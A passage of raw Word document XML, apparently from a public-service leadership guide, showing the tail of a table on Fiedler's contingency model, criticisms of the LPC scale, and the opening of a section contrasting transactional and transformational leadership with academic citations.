                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Poor</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00EE501F" w:rsidRPr="005A0D09" w:rsidRDefault="00EE501F" w:rsidP="00D61889">
            <w:pPr>
              <w:keepNext/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A0D09">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Structured</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2127" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00EE501F" w:rsidRPr="005A0D09" w:rsidRDefault="00EE501F" w:rsidP="00D61889">
            <w:pPr>
              <w:keepNext/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A0D09">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Weak</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00EE501F" w:rsidRPr="005A0D09" w:rsidRDefault="007A129A" w:rsidP="00D61889">
            <w:pPr>
              <w:keepNext/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Relations-oriented</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EE501F" w:rsidRPr="00EE501F" w:rsidTr="007D4C39">
        <w:trPr>
          <w:trHeight w:hRule="exact" w:val="312"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00EE501F" w:rsidRPr="00EE501F" w:rsidRDefault="00EE501F" w:rsidP="005C26DE">
            <w:pPr>
              <w:keepNext/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2264" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00EE501F" w:rsidRPr="005A0D09" w:rsidRDefault="00EE501F" w:rsidP="00D61889">
            <w:pPr>
              <w:keepNext/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A0D09">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Poor</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00EE501F" w:rsidRPr="005A0D09" w:rsidRDefault="00EE501F" w:rsidP="00D61889">
            <w:pPr>
              <w:keepNext/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A0D09">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Unstructured</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2127" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00EE501F" w:rsidRPr="005A0D09" w:rsidRDefault="00EE501F" w:rsidP="00D61889">
            <w:pPr>
              <w:keepNext/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A0D09">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Strong</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00EE501F" w:rsidRPr="005A0D09" w:rsidRDefault="007A129A" w:rsidP="00D61889">
            <w:pPr>
              <w:keepNext/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Relations-oriented</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EE501F" w:rsidRPr="00EE501F" w:rsidTr="007D4C39">
        <w:trPr>
          <w:trHeight w:hRule="exact" w:val="312"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00EE501F" w:rsidRPr="00EE501F" w:rsidRDefault="00EE501F" w:rsidP="005C26DE">
            <w:pPr>
              <w:keepNext/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2264" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00EE501F" w:rsidRPr="005A0D09" w:rsidRDefault="00EE501F" w:rsidP="00D61889">
            <w:pPr>
              <w:keepNext/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A0D09">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Poor</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00EE501F" w:rsidRPr="005A0D09" w:rsidRDefault="00EE501F" w:rsidP="00D61889">
            <w:pPr>
              <w:keepNext/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A0D09">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Unstructured</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2127" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00EE501F" w:rsidRPr="005A0D09" w:rsidRDefault="00EE501F" w:rsidP="00D61889">
            <w:pPr>
              <w:keepNext/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A0D09">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Weak</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00EE501F" w:rsidRPr="005A0D09" w:rsidRDefault="007A129A" w:rsidP="00D61889">
            <w:pPr>
              <w:keepNext/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Task-oriented</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00FD5C8B" w:rsidRDefault="00FD5C8B" w:rsidP="005C26DE">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="00084871">
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>: Breakdown of situations and most effective leader style</w:t>
      </w:r>
      <w:r w:rsidR="00A72C9D">
        <w:t xml:space="preserve"> for each</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00627ABB" w:rsidRDefault="00627ABB">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Batang" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BD5571" w:rsidRDefault="00BD5571" w:rsidP="004464C0">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="00904FBE">
        <w:lastRenderedPageBreak/>
        <w:t>Criticisms and challen</w:t>
      </w:r>
      <w:r w:rsidR="00BE0344">
        <w:t>ges</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000C02B9" w:rsidRDefault="0020706D" w:rsidP="000C02B9">
      <w:r>
        <w:t>Fiedler’s model</w:t>
      </w:r>
      <w:r w:rsidR="00BE0344">
        <w:t xml:space="preserve"> has been criticised for </w:t>
      </w:r>
      <w:r w:rsidR="007A129A">
        <w:t>assuming</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> leadership style is fixed</w:t>
      </w:r>
      <w:r w:rsidR="000C02B9">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidR="007A129A">
        <w:t>for suggesting</w:t>
      </w:r>
      <w:r w:rsidR="000C02B9">
        <w:t xml:space="preserve"> that situations be manipulated </w:t>
      </w:r>
      <w:r w:rsidR="007A129A">
        <w:t>rather than</w:t>
      </w:r>
      <w:r w:rsidR="000C02B9">
        <w:t xml:space="preserve"> leaders adapting their natural style</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="000C02B9">
        <w:t xml:space="preserve">In terms of the model itself, Mitchell et al cite a number of studies querying the interpretation of high and low LPC scores correlating with people versus task orientation and note that even under the best circumstances, the LPC scale has only about a 50 per cent reliable variance </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="2145154047"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="000C02B9">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="000C02B9">
            <w:instrText xml:space="preserve">CITATION Mit70 \l 3081 </w:instrText>
          </w:r>
          <w:r w:rsidR="000C02B9">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="000C02B9" w:rsidRPr="00AF5576">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>(Mitchell, et al., 1970)</w:t>
          </w:r>
          <w:r w:rsidR="000C02B9">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="000C02B9">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001938A1" w:rsidRDefault="001938A1" w:rsidP="004464C0">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Further reading</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001938A1" w:rsidRDefault="00F62D9A" w:rsidP="001938A1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Fred Fiedler (1967). </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C26DE">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:i/>
        </w:rPr>
        <w:t>A Theory of Leadership Effectiveness</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BE0344" w:rsidRDefault="00BE0344">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E86D6A" w:rsidRPr="00D74478" w:rsidRDefault="00E86D6A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc374536616"/>
      <w:r w:rsidRPr="001B689D">
        <w:lastRenderedPageBreak/>
        <w:t>Transactional leadership</w:t>
      </w:r>
      <w:r w:rsidR="00346518" w:rsidRPr="001B689D">
        <w:t xml:space="preserve"> and transformational</w:t>
      </w:r>
      <w:r w:rsidR="00346518">
        <w:t xml:space="preserve"> leadership</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w:rsidR="00346518" w:rsidRDefault="00F7291B" w:rsidP="005C26DE">
      <w:pPr>
        <w:pStyle w:val="APSCBulletedtext"/>
      </w:pPr>
      <w:r>
        <w:t>Transactional l</w:t>
      </w:r>
      <w:r w:rsidR="00726306">
        <w:t>eadership</w:t>
      </w:r>
      <w:r w:rsidR="00AD1C03">
        <w:t xml:space="preserve"> views leadership in terms of an </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">exchange </w:t>
      </w:r>
      <w:r w:rsidR="00726306">
        <w:t>between leader and follower.</w:t>
      </w:r>
      <w:r w:rsidR="002016AB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00726306">
        <w:t>At its most basic this transaction</w:t>
      </w:r>
      <w:r w:rsidR="00AD1C03">
        <w:t xml:space="preserve"> involves the</w:t>
      </w:r>
      <w:r w:rsidR="00726306">
        <w:t xml:space="preserve"> exchange of reward for work.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00346518" w:rsidRDefault="00F7291B" w:rsidP="005C26DE">
      <w:pPr>
        <w:pStyle w:val="APSCBulletedtext"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Transformational </w:t>
      </w:r>
      <w:r w:rsidR="00AD1C03">
        <w:t>leaders</w:t>
      </w:r>
      <w:r w:rsidR="00D61889">
        <w:t xml:space="preserve"> seek to raise</w:t>
      </w:r>
      <w:r w:rsidR="00AD1C03">
        <w:t xml:space="preserve"> followers’ consciousness about issues of consequenc</w:t>
      </w:r>
      <w:r w:rsidR="00D61889">
        <w:t xml:space="preserve">e and subsequently transform </w:t>
      </w:r>
      <w:r w:rsidR="00AD1C03">
        <w:t>followers into leaders themselves.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00720574" w:rsidRDefault="0052770A" w:rsidP="00720574">
      <w:r>
        <w:t>Based on his observations of political leaders</w:t>
      </w:r>
      <w:r w:rsidR="009B6ED1">
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A46F8F">
        <w:t>JM</w:t>
      </w:r>
      <w:r w:rsidR="009B6ED1">
        <w:t xml:space="preserve"> Burns’ </w:t>
      </w:r>
      <w:r w:rsidR="0026661E">
        <w:t xml:space="preserve">1978 </w:t>
      </w:r>
      <w:r w:rsidR="009B6ED1">
        <w:t xml:space="preserve">book, </w:t>
      </w:r>
      <w:r w:rsidR="009B6ED1" w:rsidRPr="00EE5CC8">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Leadership</w:t>
      </w:r>
      <w:r w:rsidR="009B6ED1">
        <w:t>, contrasts</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> transactional leadership with transformational leadership</w:t>
      </w:r>
      <w:r w:rsidR="00F74C4B">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00F7291B">
        <w:t xml:space="preserve">Transactional </w:t>
      </w:r>
      <w:r w:rsidR="00720574" w:rsidRPr="00FB0200">
        <w:t xml:space="preserve">leadership </w:t>
      </w:r>
      <w:r w:rsidR="00F74C4B">
        <w:t>describes</w:t>
      </w:r>
      <w:r w:rsidR="00720574" w:rsidRPr="00FB0200">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F74C4B">
        <w:t>a relationship</w:t>
      </w:r>
      <w:r w:rsidR="00F74C4B" w:rsidRPr="00FB0200">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00720574" w:rsidRPr="00FB0200">
        <w:t>in which the leader initiates an exchange of ‘valued things’</w:t>
      </w:r>
      <w:r w:rsidR="009B6ED1">
        <w:t xml:space="preserve"> which motivate and bind followers to the leader</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="1224644608"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00720574" w:rsidRPr="00720574">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00720574" w:rsidRPr="00720574">
            <w:instrText xml:space="preserve"> CITATION Goe05 \l 3081 </w:instrText>
          </w:r>
          <w:r w:rsidR="00720574" w:rsidRPr="00720574">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00720574" w:rsidRPr="00720574">
            <w:t xml:space="preserve"> (Goethals, 2005)</w:t>
          </w:r>
          <w:r w:rsidR="00720574" w:rsidRPr="00720574">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00720574" w:rsidRPr="00FB0200">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00DC3512">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B46770">
        <w:t xml:space="preserve">At its most </w:t>
      </w:r>
      <w:r w:rsidR="00726306">
        <w:t>basic</w:t>
      </w:r>
      <w:r w:rsidR="001235A7">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00726306">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B46770">
        <w:t>transactional leadership is the exchange of reward for work</w:t>
      </w:r>
      <w:r w:rsidR="001751B8">
        <w:t xml:space="preserve"> – rewards could be psychological or material in nature </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="1129895103"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="001751B8">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="001751B8">
            <w:instrText xml:space="preserve"> CITATION Bas08 \l 3081 </w:instrText>
          </w:r>
          <w:r w:rsidR="001751B8">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="001751B8" w:rsidRPr="005C26DE">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>(Bass &amp; Bass, 2008)</w:t>
          </w:r>
          <w:r w:rsidR="001751B8">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00B46770">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00D61889">
        <w:t>Transactional</w:t>
      </w:r>
      <w:r w:rsidR="00B46770">
        <w:t xml:space="preserve"> leadership </w:t>
      </w:r>
      <w:r w:rsidR="00D61889">
        <w:t xml:space="preserve">also </w:t>
      </w:r>
      <w:r w:rsidR="00C70DBA">
        <w:t>promote</w:t>
      </w:r>
      <w:r w:rsidR="00D61889">
        <w:t xml:space="preserve">s compliance through </w:t>
      </w:r>
      <w:r w:rsidR="00C70DBA">
        <w:t xml:space="preserve">threat of punishment. </w:t>
      </w:r>
      <w:r w:rsidR="003E4736">
        <w:t>Si</w:t>
      </w:r>
      <w:r w:rsidR="00AA06DC">
        <w:t xml:space="preserve">ms and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00AA06DC">
        <w:t>Lorenzi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003E4736">
        <w:t xml:space="preserve"> comment that</w:t>
      </w:r>
      <w:r w:rsidR="00AA06DC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003E4736">
        <w:t>‘</w:t>
      </w:r>
      <w:r w:rsidR="00AA06DC">
        <w:t>effective leadership reinforces desired followers’ behaviour and eliminates undesired follower behaviour through providing or denying social, symbolic or material rewards and punishments’</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="968714644"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="003525BC">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="003525BC">
            <w:instrText xml:space="preserve">CITATION Bas08 \p 366 \l 3081 </w:instrText>
          </w:r>
          <w:r w:rsidR="003525BC">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="003525BC">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="003525BC" w:rsidRPr="003525BC">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>(Bass &amp; Bass, 2008, p. 366)</w:t>
          </w:r>
          <w:r w:rsidR="003525BC">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00AA06DC">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00B46770">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001235A7" w:rsidRDefault="00300A8E" w:rsidP="001235A7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Transformational leadership, on the other hand,</w:t>
      </w:r>
      <w:r w:rsidR="00004FDF">
        <w:t xml:space="preserve"> ‘originates in the personal values and beliefs of leaders, not in an exchange of commodities between leaders and followers’ </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-2078738489"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00004FDF">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00004FDF">
            <w:instrText xml:space="preserve">CITATION Kuh87 \p 649-650 \l 3081 </w:instrText>
          </w:r>
          <w:r w:rsidR="00004FDF">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00004FDF" w:rsidRPr="005C26DE">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>(Kuhnert &amp; Lewis, 1987, pp. 649-650)</w:t>
          </w:r>
          <w:r w:rsidR="00004FDF">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00004FDF">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="009B6ED1">
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidR="001235A7">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001235A7" w:rsidRPr="005A0D09">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>transforming</w:t>
      </w:r>
      <w:r w:rsidR="001235A7">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> leader: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001235A7" w:rsidRDefault="001235A7" w:rsidP="001235A7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:ind w:left="709" w:hanging="425"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A0D09">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">raises the followers’ level of consciousness about the importance and value of designated outcomes and ways of reaching them; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001235A7" w:rsidRDefault="001235A7" w:rsidP="001235A7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:ind w:left="709" w:hanging="425"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A0D09">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">gets the followers to transcend their own self-interests for the sake of the team, organisation or the larger polity; and </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001235A7" w:rsidRPr="005A0D09" w:rsidRDefault="001235A7" w:rsidP="001235A7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:ind w:left="709" w:hanging="425"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005A0D09">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>raises</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005A0D09">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> the follow</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">ers’ level of need </w:t>
      </w:r>
      <w:r w:rsidRPr="005A0D09">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>from lower-level concerns for safety and security to higher-level needs for achievement and self-actualisation</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
          </w:rPr>
          <w:id w:val="-2004428222"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
            </w:rPr>
            <w:instrText xml:space="preserve">CITATION Bas08 \p 619 \l 3081 </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
            </w:rPr>
